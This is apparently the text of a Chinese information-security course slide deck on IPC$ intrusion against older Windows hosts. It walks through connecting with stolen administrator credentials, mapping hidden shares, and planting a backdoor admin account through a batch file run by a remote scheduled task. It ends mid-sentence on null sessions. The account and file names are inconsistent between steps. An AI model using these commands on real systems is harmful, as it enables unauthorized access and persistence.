黑客攻击和防范〔基于认证的入侵.pptVIP

《信息安全技术》 基于认证的入侵 ——IPC$入侵 1、IPC相关知识：???? IPC即Internet Process Connection的缩写，可理解为“命名 管道” 资源，用来在两台计算机进程之间建立通信连接，而IPC后面 的$是Windows系统所使用的隐藏符号，因此“IPC$”表示隐藏的 IPC共享。IPC$是Windows NT/2000/XP/2003的一项特有功能，通 过它，一些网络程序的数据交换可以建立在它上面，实现远程访问 管理计算机。IPC连接就好像是挖好的地道，通信程序就通过这个地 道访问目标主机。默认情况下IPC是共享的，通过它，入侵者能实现 远程控制目标主机。???? 上述Windows系统在安装完成后，自动设置共享的目录为：C 盘、D盘、E盘、ADMIN目录(C:\WINNT\)等，即为C$、D$、E$、 ADMIN$等。但这些共享是隐藏的，只有管理员能对他们进行远程操 作，在MS-DOS中键入“net share”命令可以来查看本机共享资 源，如图4-23所示。 实例一： 建立和断开IPC$连接 下面通过一个实例介绍如何建立和断开IPC$连接，以及入侵者 如何将远程磁盘映射到本地的。通过IPC$连接进行入侵的条件是已 获得目标主机管理员帐号和密码。具体步骤如下：??? (1)打开cmd命令行窗口；??? (2)建立IPC$连接：????使用命令：net use \\IP\IPC$ “PASSWD” /USER: “ADMIN”与目标主机建立IPC$连接。????一个例子： net use \\192.168.46.128\ipc$ 123456 /user:administrator??? (3)映射网络驱动器：?????? 使用命令：net use z: \\192.168.46.128\c$ ?????? 该命令表示把目标主机192.168.46.128上面的隐藏c盘映射为本机的Z盘，映射成功后，打开“我的电脑”会发现多出一个Z盘，上面写着“192.168.46.128上的Z$”。如图4-24所示： (4)查找指定文件：??????鼠标右键单击Z盘，点击弹出菜单的“搜索”， 查找关键字“**”，等待一会儿得到结果，可以将找 到的文件拷贝、粘贴等，像对本地磁盘操作一样。?? (5)断开连接：??????键入“net use * /del”命令断开所有的IPC$连 接。键入“net use \\目标IP\IPC$ /del”可以删除指 定目标IP的IPC$连接。 实例二：建立后门帐号 (1)编写BAT文件：?????? 打开记事本，输入“net user emile 123456 /add”和“net localgroup administrators emile /add”，然后把文件另存为“hack.bat”,保存在cmd当前默认目录下。??? (2)与目标主机建立IPC$连接，以192.168.1.60为例：?????? 打开cmd窗口，分别执行命令,如图4-25：?????? net use \\192.168.46.128\ipc$ 123456 /user:administrator?????? net use z: \\192.168. 46.128\C$ (3)拷贝bat文件到目标主机：??????在cmd窗口输入copy hack.bat \\192.168.46.128\C$，把文件拷贝到目标位置,如图4-26；也可以打开映射驱动器用图形界面直接进行拷贝操作。 (4)通过计划任务使远程主机执行hack.bat文件：??????首先键入“net time \\IP”查看远程主机的系统时间，再键入 “at \\IP TIME COMMAND”命令在远程主机上建立计划任务如图4- 27。?????? ?????? 计划任务添加完毕后，使用命令“net use * /del”断开IPC$连接，如图4-28。 (5)验证帐号是否成功建立：?????? 等待一段时间，当估计远程主机已经执行back.bat文件 后，通过用新帐号建立IPC$连接来验证是否成功建立 “keikey”帐号，连接成功则说明帐号成功建立，如图4-29。 实例三： IPC$空链接漏洞 1、漏洞描述 　　IPC$本来要求客户机需要有足够的权限才能连接到目标主 机，然而事实并不尽然。IPC$空连接漏洞允许客户端只使用空 用户名、空密码就可以与目标主机成功建立连接。 2、漏洞带来的影响 　 入侵者利用该漏洞可以与目标主机进行空连接，但是无法 执行管理类操作，例如不能执行映射网络驱动器、上传文件